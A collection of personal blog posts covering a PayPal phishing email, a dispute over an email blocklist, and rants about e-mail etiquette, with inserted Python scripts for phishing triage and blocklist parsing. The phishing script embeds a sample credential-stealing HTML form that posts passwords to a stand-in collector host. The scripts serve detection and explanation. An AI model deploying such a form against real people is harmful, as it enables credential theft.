Yet Another PayPal Phishing Attempt

This one looks, on the surface, quite convincing.

This morning, I got the following message that appeared to be from PayPal in my inbox:

Dear PayPal Customer,

You have added andrew1987 @btconnect.com as a new email address for your Paypal account.

If you did not authorize this change, check with family members and others who may have access to your account first. If you still feel that an unauthorized person has changed your email, submit the form attached to your email in order to keep your original email and restore your Paypal account.

NOTE: The form needs to be opened in a modern browser which has javascript enabled (ex: Internet Explorer 7, Firefox 3, Safari 3, Opera 9)

Please understand that this is a security measure intended to help protect you and your account. We apologize for any inconvenience.

If you choose to ignore our request, you leave us no choice but to temporary suspend your account.

Sincerely, PayPal Account Review Department.

As shown in the accompanying screenshot, the message included all the usual PayPal logos and even a VeriSign Identity Protection logo. (What good is a logo like that if it’s so easily stolen and reused by scammers?) Of course, it was from an address at ppal.com (not paypal.com) and it was addressed to “Dear PayPal Customer” instead of my name. That’s a dead giveaway that the message is not real.

Of course, there was an HTML file attached. Opening the file in a text editor — not a Web browser! — showed HTML code with a JavaScript that would, among other things, collect your PayPal name, password, date of birth, and mother’s maiden name. I don’t know enough about JavaScript to figure out what would be done with this info, but I can assume it gets sent back to the folks who will then use it for identity theft.

Reading the message offers other clues that it’s fake. For example, although it’s standard for PayPal to send you an e-mail message if you add or change an e-mail account, they make a conflicting request. First, they say action is only necessary if you believe your account has been compromised. Then they tell you that if you ignore the request, they’ll suspend your account. That, of course, makes no sense.
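The clues described above (look-alike sender domain, generic greeting, suspension threat, and an HTML attachment that asks for a password) can be checked without opening anything in a browser. The script below is an added example, not code from the message or from PayPal; the sample e-mail is constructed, and the attachment name `form.html`, the form's action host and the finding codes are assumptions made for illustration.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser

# Constructed sample modelled on the message described above. The attachment
# name and the form's action host are placeholders, not values from the post.
SAMPLE_EML = """\
From: PayPal <service@ppal.com>
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Dear PayPal Customer,
If you choose to ignore our request, we will suspend your account.

--b1
Content-Type: text/html; charset="utf-8"
Content-Disposition: attachment; filename="form.html"

<html><body>
<form method="post" action="http://collector.example.invalid/save">
<input type="text" name="email"><input type="password" name="pass">
<input type="text" name="dob"><input type="text" name="maiden_name">
</form><script>/* constructed stand-in */</script>
</body></html>
--b1--
"""

class FormScan(HTMLParser):
    """Reads the markup as text; nothing is rendered or executed."""
    def __init__(self):
        super().__init__()
        self.actions, self.password_inputs, self.scripts = [], 0, 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self.scripts += 1

def triage(raw, expected_domain="paypal.com"):
    """Return (code, detail) findings for the clues the post walks through."""
    msg, findings = message_from_string(raw), []
    domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    if domain != expected_domain and not domain.endswith("." + expected_domain):
        findings.append(("sender-domain", domain))
    for part in msg.walk():
        if part.is_multipart():
            continue
        text = part.get_payload(decode=True).decode("utf-8", "replace")
        if part.get_content_type() == "text/plain":
            if re.search(r"^Dear (PayPal )?(Customer|Member|User)\b", text, re.I | re.M):
                findings.append(("generic-greeting", "no account holder name"))
            if re.search(r"suspend\s+your\s+account", text, re.I):
                findings.append(("suspension-threat", "urgency pressure"))
        elif part.get_content_type() == "text/html" and part.get_filename():
            scan = FormScan()
            scan.feed(text)
            if scan.password_inputs:
                findings.append(("credential-form", ", ".join(scan.actions)))
            if scan.scripts:
                findings.append(("script-in-attachment", part.get_filename()))
    return findings

if __name__ == "__main__":
    for code, detail in triage(SAMPLE_EML):
        print(f"{code}: {detail}")
```

The `credential-form` finding shows where a submitted form would send its fields, which is the question the attachment's source leaves open for a reader who does not know JavaScript.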

But I’m sure that many people would fall for this. After all, it indicates that a stranger’s email has been added to their PayPal account. All the talk about Internet fraud would send a person into panic mode. He’d open the file attachment and possibly go through the process of giving away information about his own account.

You have no idea how much this pisses me off. I know people who have been scammed by emails like this. One of them is an elderly man who had a bank account tapped into and partially drained before he was able to resolve the problem.

I immediately forwarded this message to spoofs@paypal.com — the address you should forward any questionable PayPal communication to.

Please help spread the word among friends and family members who might fall for phishing attempts like this. Tell them that if they get a communication from any company they do business with, they should log into their account the usual way, not by clicking a link or opening a file attachment in the message they receive.

September 3, 2011 Update:

Thought I’d mention another version of this scam. Here’s the message that arrived today:

Dear Customer,

You sent a payment of 40.90 GBP to Mobile Top-up Online
(sales@topups247.com)

If you have questions about the shipping and tracking of your
purchased item or service, please contact the seller.

Please download the document attached to this
email to cancel or forward your purchase.
————————-

Merchant
Mobile Top-up Online
sales@topups247.com
Instructions to merchant
You haven’t entered any instructions.

Shipping address – Unconfirmed
United Kingdom
Postage details

Of course, this one came with an HTML attachment, too. It’s named “PayPal Refund.html” and, to someone who isn’t actually thinking, it might seem like something worth double-clicking to fix the perceived incorrect charge.

Don’t get scammed.

November 21, 2011 Update: They’re now doing the same thing with the name sarah@comcast.com.

Who’s Filtering Your E-Mail?

And why?

The other day I sent an e-mail message to one of my editors. Within seconds, the message was bounced back to me with this notice at the top:

Hi. This is the qmail-send program at smtpauth22.prod.mesa1.secureserver.net.
I’m afraid I wasn’t able to deliver your message to the following addresses.
This is a permanent error; I’ve given up. Sorry it didn’t work out.

<[redacted e-mail address]>:
[redacted IP address] does not like recipient.
Remote host said: 554 5.7.1 Service unavailable; Client host [64.202.165.44] blocked using dnsbl.ahbl.org; GoDaddy – Continued hosting of FreeSpeechStore hate website on 72.167.250.55, ignoring abuse
Giving up on [redacted IP address].

My first thought was WTF?

I tried again and got the same result. Then I started researching. I discovered that www.ahbl.org is the domain name for the Abusive Hosts Blocking List (AHBL), an organization that apparently maintains a list of IP addresses it deems abusive. The owner or manager of the site had decided that he/she didn’t like GoDaddy.com because it hosts the conservative “hate speech” site FreeSpeechStore. (And no, I won’t link to that drivel.) My editor’s ISP was evidently using AHBL to filter incoming mail.
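For readers who want to decode a bounce like the one above, the following added example (not part of the original post or of any AHBL tooling) parses the quoted 554 line and builds the DNS name a receiving server queries for a DNS blocklist check: the sending server's IPv4 octets reversed, followed by the list's zone. It performs no network lookup; the function names are assumptions made for illustration.

```python
import ipaddress
import re

# Rejection line as quoted in the bounce above (\u2013 is the dash it contains).
BOUNCE_LINE = ("Remote host said: 554 5.7.1 Service unavailable; "
               "Client host [64.202.165.44] blocked using dnsbl.ahbl.org; "
               "GoDaddy \u2013 Continued hosting of FreeSpeechStore hate website "
               "on 72.167.250.55, ignoring abuse")

REJECT_RE = re.compile(
    r"(?P<code>\d{3}) (?P<enhanced>\d\.\d{1,3}\.\d{1,3}) .*?"
    r"Client host \[(?P<ip>[0-9.]+)\] blocked using (?P<zone>[A-Za-z0-9.-]+);"
    r"\s*(?P<reason>.*)")

LISTED_NET = ipaddress.ip_network("127.0.0.0/8")


def parse_rejection(line):
    """Split a blocklist rejection into reply code, client IP, zone and reason."""
    m = REJECT_RE.search(line)
    if not m:
        return None
    info = m.groupdict()
    # 5xx replies are permanent failures, which is why qmail gave up at once.
    info["permanent"] = info["code"].startswith("5")
    return info


def dnsbl_query_name(ip, zone):
    """Reverse the IPv4 octets and append the blocklist zone."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone.strip(".")


def is_listed(a_records):
    """A listed host resolves to an address in 127.0.0.0/8; no answer means not listed."""
    return any(ipaddress.ip_address(a) in LISTED_NET for a in a_records)


if __name__ == "__main__":
    info = parse_rejection(BOUNCE_LINE)
    print(info["ip"], "->", dnsbl_query_name(info["ip"], info["zone"]))
    print("reason given by the list:", info["reason"])
```

The address checked is that of the server that handed the message over, not the author's own machine, so every customer relaying through that server gets the same answer.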

I e-mailed AHBL the following message using my MobileMe e-mail address (since I assumed my e-mail account hosted at GoDaddy.com would be blocked):

Unfortunately, I host a non-abusive site and my main e-mail (not this one) is at GoDaddy.com. Your site is preventing my e-mail from reaching some destinations because of some link between GoDaddy.com and freespeechstore.com.

Do you really think this is fair to me and others in the same situation?

The response I got was surprising. Someone named Brielle Bruns wrote:

Unfortunately, your provider has stated to us that they will not enforce their Terms Of Service or Acceptable Use Policy. They are turning a blind eye to abuse and harassment, which is something we can no longer ignore.

To give you an idea of why we are taking this issue as seriously as we are, one of Mr Scoville contacted the local police department, fire department, child welfare, schools, etc of one of his victims, and claimed that he and his wife were molesting their children and others from the school.

Put yourself in the victim’s shoes, and then ask yourself whether or not you’d do whatever it took to prevent anyone else from being victimized by Mr Scoville.

I repeat: WTF? My response explained exactly how I felt about the situation:

I really don’t see why I need to be dragged into this.

I agree wholeheartedly that if what you say is true, this Scoville character is an asshole and a menace to society. But let’s look at this objectively on two fronts:

– One of the founding principles of this country is free speech. If Scoville wants to create a website full of hate speech, it is his right to do so. You’re attempting to censor him by acting as a third party filtering service. Seriously: what gives you the right?

– To punish him and (assumedly) GoDaddy.com, you’re punishing ME, an innocent bystander to this whole thing. Your failure to allow my message to be received by my editor directly interferes with my ability to submit work and invoices for that work. You are cutting into my ability to make a living. WTF?

I don’t care WHY you are taking this seriously. It’s none of your business — or mine. Let the police handle it — that’s what our tax dollars pay them to do.

I’ve issued a complaint to my editor and asked him to contact his ISP or system administrator — whoever is using your services. I’ll forward this message to him as well. You are stepping beyond your legal rights in this. I’m hoping my editor complains and your service is no longer utilized by his company or ISP.

The response I got back picked apart my e-mail message paragraph by paragraph, attempting to justify the site’s action against GoDaddy just because it hosts some wacko’s Web site. Honestly I didn’t even bother reading it. It was clear that Bruns was just as wacko as the person he/she was trying to harm — by harming people like me. Clearly, I was wasting my time communicating with this person.

So I wrote to the editor I’d been trying to contact, this time using my MobileMe account. I’d already updated him about what was going on. Now I decided to make a formal request:

I respectfully request that you ask your ISP or system administrator to stop using the services of Abusive Hosts Blocking Service. They are preventing me from communicating with you on my primary e-mail address, dragging us into some sort of war they have with GoDaddy.com, and simply do not care how much they inconvenience innocent bystanders.

The fact that your ISP or System Administrator utilizes a service that would do such a thing is unthinkable to me.

When I didn’t get a response, I followed it up with this:

Seriously…you need to do something about this. Whoever authorized use of this blocking organization is preventing me — and possibly your advertisers! — from contacting you. THIS IS DEFINITELY A PROBLEM ON YOUR END. Tell your ISP or System Administrator to shut that service off.

The woman who runs it is on some kind of holy crusade and she’s been very rude to me in our e-mail exchanges. I’ve lost an hour of my day troubleshooting this issue, only to be frustrated by her holier-than-thou attitude.

The day ended. The editor is back east, so I didn’t really expect immediate action. In the morning, however, I had the result I wanted. My editor wrote:

Thanks for letting me know what you’ve learned. I’ll be discussing it with my boss today and we’ll figure out what the next step will be.

I later was CCed on an e-mail message from my editor’s boss to the company’s ISP:

Below is a dialogue between one of our writers and someone named Brielle Bruns from an outfit called “The Summit Open Source Development Group” which seems to be at the root of our problem receiving some business critical e-mails from Godaddy based addresses.

In addition to blocking e-mails from our writer, I have had one of my attorney’s e-mails blocked and missed an important deadline as a result. I have no idea how many e-mails have been blocked from our subscribers or [redacted] customers but I have to believe the number is sizable.

As far as any of my businesses are concerned, please IMMEDIATELY STOP using whatever “service” is being provided by Brille Burns’ outfit. Whatever dispute she or her group has with this Scottville guy, it has nothing to do with us and her organization is negatively impacting our business and customers.

Please take care of this immediately.

I replied with a thank you message to my editor and his boss. The block was soon lifted and I could again begin using my regular e-mail address to communicate with my editor.

One of the subsequent messages flying back and forth between the parties included this comment:

PS: We just found this: from 2.5 years ago ref: “Brian J. Bruns convicted felon and owner of www.ahbl.org Abusive Hosts Blocking List AHBL” http://criminal-brian-j-bruns.blogspot.com/

The link is to a Blogger blog that purports to share documents about this person’s felony conviction and sexual deviations. (I still can’t believe the kind of crap out there on the Web.) It looks pretty real, but I’m a skeptic on these things and wouldn’t be the least bit surprised to learn that it was Bruns’s nemesis, Scoville, slinging dirt. Seriously: some people need to get a life.

When the hubbub had died down, I e-mailed the ISP representative. I had his e-mail address from the initial message to him that I was CCed on. I told him I was interested in blogging about this and asked a few questions. He replied that he’d have to ask his boss about some of the answers, but he did state the following:

I can tell you, though, in regards #3, we were using the service entirely for spam prevention. We use a number of different services for spam prevention, and had no knowledge of their political agenda. As soon as we found out what was going on with this service, which was, coincidentally, shortly before [redacted] e-mailed us, we stopped using this service. I am very sorry for the problems this caused, and we would never knowingly use a service that had a political agenda like this.

Which begs the questions:

  • What “service” is your ISP using to combat spam?
  • How many important, legitimate e-mail messages have you missed because of a situation like this?
  • What gives organizations the right to classify an IP address as abusive or harmful, regardless of who else might be using it via shared hosting or e-mail?

If you or your ISP is using AHBL, stop now. The company obviously has a political agenda that does not consider the negative aspects of its actions. Why would anyone use a company like this to filter e-mail? Wouldn’t you rather get a little spam than miss out on important communications from friends, family, and business associates? I would!

As for me, I’d already begun moving my Web sites and e-mail addresses away from GoDaddy.com — but for other, service-related reasons. They still have not provided a satisfactory explanation to me about what’s going on with the “hate site.” This just confirms that my switch to a new ISP was long overdue.

On Limited Literacy

Is it wrong to be prejudiced against people who don’t even try to be literate?

I mentioned in my blog that I sometimes allow rated helicopter pilots to fly my aircraft on ferry flights for my flight cost. This is a substantial savings over what they’d pay to rent an aircraft to build time. In addition, they get the chance to fly a long cross-country flight (usually around 10 hours over two days) with an experienced pilot.

I get e-mails from people who are interested in this opportunity. The most recent arrived yesterday:

Yes sir i was intrested in biulding some time i am a commercial rated pilot with 250hr most in a robinson 22 i really need this chance to fly thank you for your time.

Although he managed to capitalize the first letter of the first word and put a period after the last word everything in between is a mess. Spelling? Punctuation? Is this what our schools are churning out?

Keep in mind that he sent me this message using the contact form on my Web site. A Web site that displays my name in the browser’s address bar when viewed. A web site that includes my name, bio, and other information in all kinds of places. Yet he addressed me as “sir.” I figured he’d somehow missed that I was a woman.

Still, the whole message put me in a foul mood. My response got to the point:

Do you have an R44 endorsement?

Maria

Without an R44 endorsement and 10 hours of flight time in R44s, you cannot fly an R44 with a passenger (even me) aboard. No exceptions.

Note that I included my name, just in case he really did miss it the first time.

His reply:

no sir im afraid i do not have it i would be willing to get one if you could let me know what it would take to get one thanks for your time

He didn’t even bother trying to get capitalization or punctuation right this time. Perhaps his shift key broke.

And I wasn’t about to let him get away with “sir” again. I replied:

First of all, I’m not a “sir.” Maria is a woman’s name. You sent an e-mail message to the woman who owns and operates the company and flies the aircraft.

If you don’t have an R44 endorsement, you cannot fly the aircraft. I’m sorry. If you want to get an R44 endorsement, talk to a flight school that operates R44s.

Maria

I’m bugged by this exchange. I’m bugged that someone bordering on illiterate — or too damn lazy to even try to get his spelling, punctuation, or grammar right — has the nerve to ask if he can fly my aircraft. There’s no way in hell I’d let anyone who communicates like that at the controls.

Being a commercial pilot is more than just taking flight lessons and getting the appropriate ratings. If this guy can’t write, how do I know he can read? That he understands the training materials he was given? That he took the time to read the pilot operating manual?

You might argue that he must have because he passed a written and oral test — two of each, in fact — to get as far as he did. But how do I know the quality of his CFI or pilot examiner? Or in the case of sheer laziness, if he’s too lazy to create two short e-mail messages written in proper grammar, why should I do him any favors at all? Frankly, I think even responding to him was going beyond the call of duty here.

Am I wrong to believe that written communication should be created with some semblance to proper grammar? Am I wrong to thumb my nose at people who fail to meet even the lowest tests of their ability to communicate in writing by composing two or three complete sentences?

Is this what our schools are churning out?

This is the Kind of Stuff I Get in E-Mail

Come on folks! Get a clue!

I found this message in my spam folder this afternoon:

I have xp, I have been using microsft exscel 2007 with no problems until today
the spread sheet prints with wavy lines
cells are wavy, it is not the printer because when I go back and print old spread sheets it is fine
thank you for your help

I have not edited this other than to remove the sender’s name. I had never before been in contact with the sender.

Yes, I know I’ve written books about Excel, including Excel 2007. But does that make me the go-to person for all Excel questions? Like I have nothing better to do than sit at my desk and wait for Excel user questions to come in so I can answer them?

My Contact page clearly indicates that I do not answer questions about my books via e-mail. But this isn’t even a question about my books. This is a technical support question about a printing problem. How am I supposed to know what this person — who is borderline illiterate — did in Excel to get wavy cell lines?

This message is good for one thing, however: it gave me fodder for a rant about the kind of crap I find in my e-mail in box.

Sheesh.

Stop Being Too Cheap to Pick Up the Damn Phone

It’s 2010, not 1957.

Yeah, I know. In the old days, calling a phone number outside your area code would likely cost you a few bucks for a few minutes. “Long distance” phone calls were pricey, often 25¢ or more per minute. Cost conscious folks had no interest in following up on a vendor or service by calling in. Thus, toll-free numbers (originally “800” numbers in the U.S.) were born. By the 1990s, they’d run out of area code 800 phone numbers and added 866 and 877.

Sometime before that, however, e-mail began its rise to popularity. Why call someone on the phone when you could e-mail them for free? The result: spammers and people who seem content to cast their queries to the Internet winds, hoping an intended recipient receives them and responds sometime before the end of the week.

As phone companies began competing for our business, phone rates dropped. When I ran my BBS back in the late 1980s and early 1990s, I was thrilled to find a calling plan with unlimited long distance for only 10¢ a minute. Then 6¢. Then 5¢. This meant I could pick up my FidoNET message groups nightly for only a few dollars a month. The added benefit: I could call my mother or sister, in the next state, and talk to them for 20 minutes for only a buck.

Time marched on. Cell phones began their rise. Cell phone service providers started competing for our business, offering better and better rate plans. I pay a flat fee every month. I get free calls on weekends and non-peak times. I get free calls to any other cell number with the same carrier as mine. I get free calls to the five phone numbers I specify that aren’t with my cellular provider. I get 900 peak minutes a month. Yes, I realize that other providers have other plans that are equally good, if not better. The point is, if you have a cell phone with any decent calling plan, there’s no such thing as “long distance” anymore — at least not within the U.S.

So why the hell do people whine and complain when they can’t contact a person or organization via e-mail? Why don’t they just pick up the damn phone and dial the number that’s provided?

Here are three examples of where I’m seeing old-fashioned thinking about making a “long distance” phone call:

  • I recently designed a brochure for Flying M Air’s Moonlight Dinner Tour, which takes people to the excellent Anzio Landing restaurant at Falcon Field. The brochures were designed to be distributed at Anzio to their existing customers. Fortunately, I sent a sample of the brochure to the owner/manager before having them printed. I included my company’s phone number, which is in the 928 (northern Arizona) area code. The manager asked, “Don’t you have a local number for people to call?” I had to grab a number in the 602 (Phoenix) area code from Google Voice, set it up to forward to my phone, and add it to the brochure.
  • At least once a week, I get an e-mail message from a helicopter pilot looking for a job. They visit Flying M Air’s Web site and home in on the Contact Us page. The page includes the company phone number — seriously, how else would you make a reservation? — but they opt for the contact form, which sends me an e-mail message. So rather than taking 15 to 30 seconds of their time calling to ask if there are any jobs available, they waste 5 to 10 minutes of their time composing an e-mail message that’s supposed to impress me just to ask me to call them and request more information or an interview. Guess what? I’m not impressed. (I’ve since added a note right above that form telling them we’re not hiring. It’ll be interesting to see how many job seekers ignore that.)
  • A recent comment on wickenburg-az.com, a Web site I manage, complained that an organization seeking support and new members had not provided an e-mail address. It had, however, provided a phone number. I pointed this out in a reply to the comment, hoping he’d stop whining and contact the organization using the method they preferred.

Come on, folks! It’s 2010! Telephone communication is cheaper than ever. It also remains the fastest way to conduct a two-way conversation with someone else.

Need information? Stop wasting time with e-mail and pick up the damn phone!